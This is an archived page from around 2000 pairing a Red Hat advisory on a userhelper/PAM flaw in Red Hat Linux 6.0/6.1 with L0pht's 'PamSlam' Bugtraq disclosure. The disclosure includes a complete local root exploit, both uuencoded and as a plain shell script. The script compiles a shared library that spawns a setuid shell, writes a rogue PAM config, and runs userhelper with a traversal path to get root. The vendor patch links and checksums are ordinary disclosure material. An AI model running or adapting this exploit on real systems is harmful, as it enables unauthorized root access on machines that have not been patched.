|
[ http://www.rootshell.com/ ] Date: Tue, 04 Jan 2000 11:58:23 -0500 From: Michael K. Johnson <johnsonm@redhat.com> --------------------------------------------------------------------- Red Hat, Inc. Security Advisory Synopsis: New version of usermode fixes security bug Advisory ID: RHSA-2000:001-01 Issue date: 2000-01-04 Updated on: 2000-01-04 Keywords: root userhelper pam Cross references: --------------------------------------------------------------------- 1. Topic: A security bug has been discovered and fixed in the userhelper program. 2. Relevant releases/architectures: Red Hat Linux 6.0 and 6.1, all architectures. 3. Problem description: A security bug was found in userhelper; the bug can be exploited to provide local users with root access. The bug has been fixed in userhelper-1.17, and pam-0.68-10 has been modified to help prevent similar attacks on other software in the future. 4. Solution: For each RPM for your particular architecture, run: rpm -Uvh <filename> where filename is the name of the RPM. 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla/ for more info): 6. Obsoleted by: 7. Conflicts with: 8. RPMs required: Intel: ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm Alpha: ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm Sparc: ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm 9. Verification: MD5 sum Package Name -------------------------------------------------------------------------- bffd4388103fa99265e267eab7ae18c8 i386/pam-0.68-10.i386.rpm 2d69859d2b1d2180d254fc263bdccf94 i386/usermode-1.17-1.i386.rpm fed2c2ad4f95829e14727a9dfceaca07 alpha/pam-0.68-10.alpha.rpm 83c69cb92b16bb0eef295acb4c857657 alpha/usermode-1.17-1.alpha.rpm 350662253d09b17d0aca4e9c7a511675 sparc/pam-0.68-10.sparc.rpm d89495957c9a438fda657b8a4a5f5578 sparc/usermode-1.17-1.sparc.rpm f9ad800f56b7bb05ce595bad824a990d SRPMS/pam-0.68-10.src.rpm 1d3b367d257a57de7d834043a4fcd87a SRPMS/usermode-1.17-1.src.rpm These packages are GPG signed by Red Hat, Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig <filename> If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nogpg <filename> 10. References: Thanks to dildog@l0pht.com for finding this bug. -------------------------------------------------------------------------- From dildog@L0PHT.COM Tue Jan 4 21:25:18 2000 Date: Tue, 4 Jan 2000 20:09:05 -0500 From: Dildog <dildog@L0PHT.COM> To: BUGTRAQ@SECURITYFOCUS.COM Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper L0pht Security Advisory Advisory Name: PamSlam Advisory Released: [01/04/00] Application: userhelper and PAM on Redhat Linux 6.0/6.1 Severity: A local user can gain root access. Status: Vendor contacted. Fix provided by vendor. Advisory released. Author: dildog@l0pht.com WWW: http://www.l0pht.com/advisories.html Overview: Both 'pam' and 'userhelper' (a setuid binary that comes with the 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper' being setuid means we can get root. Description: The combination of the fact that both userhelper and PAM follow .. paths allows us to craft up a file that causes userhelper (by way of PAM) to dlopen any shared object we want as root. The exploit is simple, and utilizes the '-w' option of userhelper, which lets us specify a program to run with the privileges designated by PAM. This tries to only execute programs that have entries in /etc/security/console.apps, but since we get to specify the name, something like ../../../tmp/myprog gets us a file open path that looks like /etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to keep a filename below a directory! After this hurdle, PAM is called to start up the binary, and it does the same thing, looking for the filename in /etc/pam.d. If we've placed a rogue pam.d configuration file in /tmp/myprog, then it can be pointed to /etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we get to pick a few shared libraries to dlopen, so at this point, we get root. The following exploit demonstrates this vulnerability by creating a 'rootshell library' that creates a shell when dlopened, creating a pam.d-style configuration file, and then running userhelper with the appropriately dotted path. Quick solution: Download the fix from RedHat at: Intel: ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm Alpha: ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm Sparc: ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm Red Hat Linux 6.0: Intel: ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm Alpha: ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm Sparc: ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm Exploit: Uudecode the following script. Run the script. begin 755 pamslam.sh M(R$O8FEN+W-H"B,*(R!P86US;&%M("T@=G5L;F5R86)I;&ET>2!I;B!2961H M870@3&EN=7@@-BXQ(&%N9"!004T@<&%M7W-T87)T"B,@9F]U;F0@8GD@9&EL M9&]G0&PP<&AT+F-O;0HC("`*(R!S>6YO<'-I<SH*(R`@("!B;W1H("=P86TG M(&%N9"`G=7-E<FAE;'!E<B<@*&$@<V5T=6ED(&)I;F%R>2!T:&%T(&-O;65S M('=I=&@@=&AE"B,@("`@)W5S97)M;V1E+3$N,34G(')P;2D@9F]L;&]W("XN M('!A=&AS+B!3:6YC92!P86U?<W1A<G0@8V%L;',@9&]W;B!T;PHC("`@(%]P M86U?861D7VAA;F1L97(H*2P@=V4@8V%N(&=E="!I="!T;R!D;&]P96X@86YY M(&9I;&4@;VX@9&ES:RX@)W5S97)H96QP97(G"B,@("`@8F5I;F<@<V5T=6ED M(&UE86YS('=E(&-A;B!G970@<F]O="X@"B,*(R!F:7@Z(`HC("`@($YO(&9U M8VMI;B!I9&5A(&9O<B!A(&=O;V0@9FEX+B!'970@<FED(&]F('1H92`N+B!P M871H<R!I;B!U<V5R:&5L<&5R(`HC("`@(&9O<B!A('%U:6-K(&9I>"X@4F5M M96UB97(@)W-T<F-A="<@:7-N)W0@82!V97)Y(&=O;V0@=V%Y(&]F(&-O;F9I M;FEN9PHC("`@(&$@<&%T:"!T;R!A('!A<G1I8W5L87(@<W5B9&ER96-T;W)Y M+@HC"B,@<')O<',@=&\@;7D@;6]M;7D@86YD(&1A9&1Y+"!C=7H@=&AE>2!M M861E(&UE(&1R:6YK(&UY(&UI;&LN"@IC870@/B!?<&%M<VQA;2YC(#P\($5/ M1@HC:6YC;'5D93QS=&1L:6(N:#X*(VEN8VQU9&4\=6YI<W1D+F@^"B-I;F-L M=61E/'-Y<R]T>7!E<RYH/@IV;VED(%]I;FET*'9O:60I"GL*("`@('-E='5I M9"AG971E=6ED*"DI.PH@("`@<WES=&5M*"(O8FEN+W-H(BD["GT*14]&"@IE M8VAO("UN("X*"F5C:&\@+64@875T:%Q<=')E<75I<F5D7%QT)%!71"]?<&%M M<VQA;2YS;R`^(%]P86US;&%M+F-O;F8*8VAM;V0@-S4U(%]P86US;&%M+F-O M;F8*"F5C:&\@+6X@+@H*9V-C("UF4$E#("UO(%]P86US;&%M+F\@+6,@7W!A M;7-L86TN8PH*96-H;R`M;B!O"@IL9"`M<VAA<F5D("UO(%]P86US;&%M+G-O M(%]P86US;&%M+F\*"F5C:&\@+6X@;PH*8VAM;V0@-S4U(%]P86US;&%M+G-O M"@IE8VAO("UN($\*"G)M(%]P86US;&%M+F,*<FT@7W!A;7-L86TN;PH*96-H M;R!/"@HO=7-R+W-B:6XO=7-E<FAE;'!E<B`M=R`N+B\N+B\N+B105T0O7W!A M;7-L86TN8V]N9@H*<VQE97`@,7,*"G)M(%]P86US;&%M+G-O"G)M(%]P86US *;&%M+F-O;F8*"@`` ` end Boing. dildog@l0pht.com [ For more advisories check out http://www.l0pht.com/advisories.html ] -------------------------------------------------------------------------- #!/bin/sh # # pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start # found by dildog@l0pht.com # # synopsis: # both 'pam' and 'userhelper' (a setuid binary that comes with the # 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to # _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper' # being setuid means we can get root. # # fix: # No fuckin idea for a good fix. Get rid of the .. paths in userhelper # for a quick fix. Remember 'strcat' isn't a very good way of confining # a path to a particular subdirectory. # # props to my mommy and daddy, cuz they made me drink my milk. cat > _pamslam.c << EOF #include<stdlib.h> #include<unistd.h> #include<sys/types.h> void _init(void) { setuid(geteuid()); system("/bin/sh"); } EOF echo -n . echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf chmod 755 _pamslam.conf echo -n . gcc -fPIC -o _pamslam.o -c _pamslam.c echo -n o ld -shared -o _pamslam.so _pamslam.o echo -n o chmod 755 _pamslam.so echo -n O rm _pamslam.c rm _pamslam.o echo O /usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf sleep 1s rm _pamslam.so rm _pamslam.conf